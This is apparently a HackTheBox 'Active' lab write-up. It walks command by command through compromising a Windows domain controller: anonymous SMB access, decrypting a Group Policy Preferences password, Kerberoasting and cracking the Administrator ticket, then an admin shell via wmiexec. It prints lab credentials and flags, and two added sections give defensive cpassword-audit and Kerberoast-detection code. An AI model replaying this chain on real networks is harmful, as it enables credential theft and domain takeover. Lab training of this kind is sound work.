HTB Active done
# Active
## OS:
Windows
## Technology:
Kerberos
LDAP
SMB
## IP Address:
10.10.10.100
## Open ports:
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-04-03 20:35:59Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
49170/tcp open msrpc Microsoft Windows RPC
49172/tcp open msrpc Microsoft Windows RPC
## Users and passwords:
active.htb\SVC_TGS
GPPstillStandingStrong2k18
active.htb\Administrator
Ticketmaster1968
# Nmap
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Active]
└─$ cat 10.10.10.100_nmap_vulns.nmap| grep open
# Nmap 7.93 scan initiated Mon Apr 3 16:35:18 2023 as: nmap -Pn -A -sV --script=default,vuln -p- --open -oA 10.10.10.100_nmap_vulns 10.10.10.100
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-04-03 20:35:59Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
49170/tcp open msrpc Microsoft Windows RPC
49172/tcp open msrpc Microsoft Windows RPC
# Add record to /etc/hosts
┌──(root㉿kali)-[~]
└─# echo "10.10.10.100 active.htb" >> /etc/hosts
# List all share names - SMB
└─$ smbclient -L //10.10.10.100 | tee 10.10.10.100_smbclient_list
Password for [WORKGROUP\kali]:do_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Anonymous login successful
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
# Read file "Groups.xml" from Replication
## List all files from share Replication
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Active]
└─$ smbclient //10.10.10.100/Replication | tee list_share_replication
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> RECURSE ON
smb: \> PROMPT OFF
smb: \> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI (0.6 KiloBytes/sec) (average 0.3 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol (15.5 KiloBytes/sec) (average 3.9 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml (3.3 KiloBytes/sec) (average 3.8 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (6.4 KiloBytes/sec) (average 4.2 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (21.0 KiloBytes/sec) (average 6.5 KiloBytes/sec)
smb: \>
## Download Groups.xml
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Active]
└─$ smbclient //10.10.10.100/Replication
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> get \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml (3.2 KiloBytes/sec) (average 3.2 KiloBytes/sec)
smb: \>
## Read file Groups.xml
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Active]
└─$ cat Groups.xml
## Decrypt Group Policy Preferences string (password)
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Active]
└─$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
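Added example, not part of this writeup, showing the defender's side of the finding above: a small Python audit that walks a local SYSVOL copy (such as the Replication tree pulled with mget earlier) and reports every Group Policy Preference XML element that still carries a cpassword attribute. The sample Groups.xml, its placeholder cpassword value and the function names are constructed for this demonstration.

```python
# Added audit example, not part of the writeup: report cpassword attributes left
# in Group Policy Preference XML under SYSVOL. MS14-025 stopped new cpasswords
# from being written but does not remove existing ones, which is why a value
# like the one decrypted above can still be found years later. Stdlib only.
import xml.etree.ElementTree as ET
from pathlib import Path

# Constructed sample modelled on the Groups.xml layout; the cpassword value is a
# placeholder string, not a real encrypted password.
SAMPLE_GROUPS_XML = """<Groups>
  <User name="active.htb\\SVC_TGS" image="2" changed="2018-07-18 20:46:06"
        uid="{CONSTRUCTED-UID}">
    <Properties action="U" newName="" fullName="" description=""
                cpassword="CONSTRUCTED+PLACEHOLDER+VALUE=" changeLogon="0"
                noChange="1" neverExpires="1" acctDisabled="0"
                userName="active.htb\\SVC_TGS"/>
  </User>
</Groups>
"""

def find_cpasswords(xml_text, source="<string>"):
    """Return one finding per element with a non-empty cpassword attribute.

    Groups.xml is the common case, but Services.xml, ScheduledTasks.xml,
    DataSources.xml, Drives.xml and Printers.xml use the same attribute, so
    every element is checked rather than one tag name.
    """
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        cpw = elem.get("cpassword")
        if cpw:  # an empty cpassword means this item sets no password
            account = (elem.get("userName") or elem.get("accountName")
                       or elem.get("runAs") or "")
            findings.append({"source": source, "tag": elem.tag,
                             "account": account, "cpassword_len": len(cpw)})
    return findings

def audit_sysvol(root_dir):
    """Walk a local SYSVOL copy and audit every XML file under it."""
    results = []
    for path in Path(root_dir).rglob("*.xml"):
        try:  # utf-8-sig strips the BOM Windows writes to these files
            results.extend(find_cpasswords(path.read_text("utf-8-sig"), str(path)))
        except ET.ParseError:
            continue  # not a policy file or damaged; keep auditing the rest
    return results

if __name__ == "__main__":
    for f in find_cpasswords(SAMPLE_GROUPS_XML, "Groups.xml"):
        print(f"[!] {f['source']}: <{f['tag']}> stores a cpassword for "
              f"{f['account']} ({f['cpassword_len']} chars)")
```

Point audit_sysvol at the directory the mget run created (it contains active.htb/Policies/...) to check a whole policy tree at once.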
# List all shares for user "SVC_TGS"
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Active]
└─$ smbmap -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18 -H 10.10.10.100 | tee list_share_svc_tgs
[+] IP: 10.10.10.100:445 Name: active.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
Replication READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLY
# List all remote users
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Active]
└─$ /home/kali/.local/bin/GetADUsers.py -all active.htb/svc_tgs -dc-ip 10.10.10.100
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[*] Querying 10.10.10.100 for information about domain.
Name            Email    PasswordLastSet             LastLogon
--------------  -------  --------------------------  --------------------------
Administrator            2018-07-18 15:06:40.351723  2023-04-04 09:56:47.239349
Guest
krbtgt                   2018-07-18 14:50:36.972031
SVC_TGS                  2018-07-18 16:14:38.402764  2018-07-21 10:01:30.320277
# Kerberoasting
## Identification of configured SPNs and extraction of hash
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Active]
└─$ /home/kali/.local/bin/GetUserSPNs.py active.htb/svc_tgs -dc-ip 10.10.10.100
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2023-04-04 09:56:47.239349

┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Active]
└─$ /home/kali/.local/bin/GetUserSPNs.py active.htb/svc_tgs -dc-ip 10.10.10.100 -request
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2023-04-04 09:56:47.239349

[-] CCache file is not found. Skipping...
$krb5tgs$23$Administrator$ACTIVE.HTB$active.htb/Administrator$3e774fe4c5a823276c214c2e477c0d85$…
## Cracking of Kerberos TGS Hash
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Active]
└─$ hashcat -m 13100 TGS_hash.txt /usr/share/wordlists/rockyou.txt --show | tee TGS_hash_hashcat.txt
$krb5tgs$23$Administrator$ACTIVE.HTB$active.htb/Administrator$3e774fe4c5a823276c214c2e477c0d85$…:Ticketmaster1968
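Added detection example, not part of this writeup, covering the two Kerberoasting steps above (the -request ticket pull and the offline crack): it scans Windows Security event 4769 records for RC4 service tickets (etype 0x17, the 23 in $krb5tgs$23$) issued for user accounts that hold an SPN, which is the signal a SOC alerts on. The event records, IP addresses, account names and function names are constructed.

```python
# Added detection example, not from the writeup. Event 4769 (Kerberos service
# ticket requested) logs the encryption type of every TGS. The ticket cracked
# above is $krb5tgs$23$, i.e. RC4-HMAC (0x17), issued for a user account
# (Administrator) that holds an SPN. That pairing is the core Kerberoast signal.
from collections import defaultdict

RC4_HMAC = "0x17"              # AES tickets log as 0x11 / 0x12
IGNORED_SERVICES = {"krbtgt"}  # TGT renewals name krbtgt as the service; not a roast

# Constructed 4769 records; accounts, IPs, times and status codes are made up.
EVENTS = [
    {"time": "2023-04-04T09:50:01", "TargetUserName": "svc_tgs@ACTIVE.HTB",
     "ServiceName": "Administrator", "TicketEncryptionType": "0x17",
     "IpAddress": "::ffff:10.10.14.5", "Status": "0x0"},
    {"time": "2023-04-04T09:50:02", "TargetUserName": "svc_tgs@ACTIVE.HTB",
     "ServiceName": "DC$", "TicketEncryptionType": "0x12",
     "IpAddress": "::ffff:10.10.14.5", "Status": "0x0"},
    {"time": "2023-04-04T09:51:00", "TargetUserName": "alice@ACTIVE.HTB",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x17",
     "IpAddress": "::ffff:10.10.10.50", "Status": "0x0"},
    {"time": "2023-04-04T09:52:00", "TargetUserName": "svc_tgs@ACTIVE.HTB",
     "ServiceName": "Administrator", "TicketEncryptionType": "0x17",
     "IpAddress": "::ffff:10.10.14.5", "Status": "0x20"},
]

def is_roast_candidate(ev):
    """RC4 service ticket, successfully issued, for a non-computer, non-krbtgt
    account. Computer accounts end in '$' and normally negotiate AES; a failed
    request (Status != 0x0) yields no ticket that could be cracked offline."""
    svc = ev["ServiceName"]
    return (ev["TicketEncryptionType"].lower() == RC4_HMAC
            and ev["Status"] == "0x0"
            and not svc.endswith("$")
            and svc.lower() not in IGNORED_SERVICES)

def roast_candidates(events):
    """Group candidate requests by (requester, source IP) so a burst of distinct
    SPNs from one principal, as GetUserSPNs -request produces, stands out."""
    by_requester = defaultdict(set)
    for ev in events:
        if is_roast_candidate(ev):
            by_requester[(ev["TargetUserName"], ev["IpAddress"])].add(ev["ServiceName"])
    return dict(by_requester)

if __name__ == "__main__":
    for (user, ip), services in roast_candidates(EVENTS).items():
        print(f"[!] {user} from {ip} pulled RC4 tickets for: {', '.join(sorted(services))}")
```

The matching mitigation for the account found above is a long random password and AES-only (msDS-SupportedEncryptionTypes) for any user account that must carry an SPN, so a pulled ticket is not crackable with a wordlist.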
# Login to remote host - Administrator
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Active]
└─$ /home/kali/.local/bin/wmiexec.py active.htb/Administrator:Ticketmaster1968@10.10.10.100
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] SMBv2.1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
active\administrator

C:\>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
=============================== ============================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
# Read flag: root.txt and user.txt
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Active]
└─$ /home/kali/.local/bin/wmiexec.py active.htb/Administrator:Ticketmaster1968@10.10.10.100
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] SMBv2.1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>type C:\Users\Administrator\Desktop\root.txt
a13b02d67d70a1e31d0be5a1d8805e8b

C:\>dir C:\Users\svc_tgs\Desktop\
[-] Decoding error detected, consider running chcp.com at the target, map the result with https://docs.python.org/3/library/codecs.html#standard-encodings and then execute wmiexec.py again with -codec and the corresponding codec
 Volume in drive C has no label.
 Volume Serial Number is 15BB-D59C

 Directory of C:\Users\svc_tgs\Desktop

21/07/2018  06:14

C:\>type C:\Users\svc_tgs\Desktop\user.txt
6894deabe9928845742728d5c4dabf77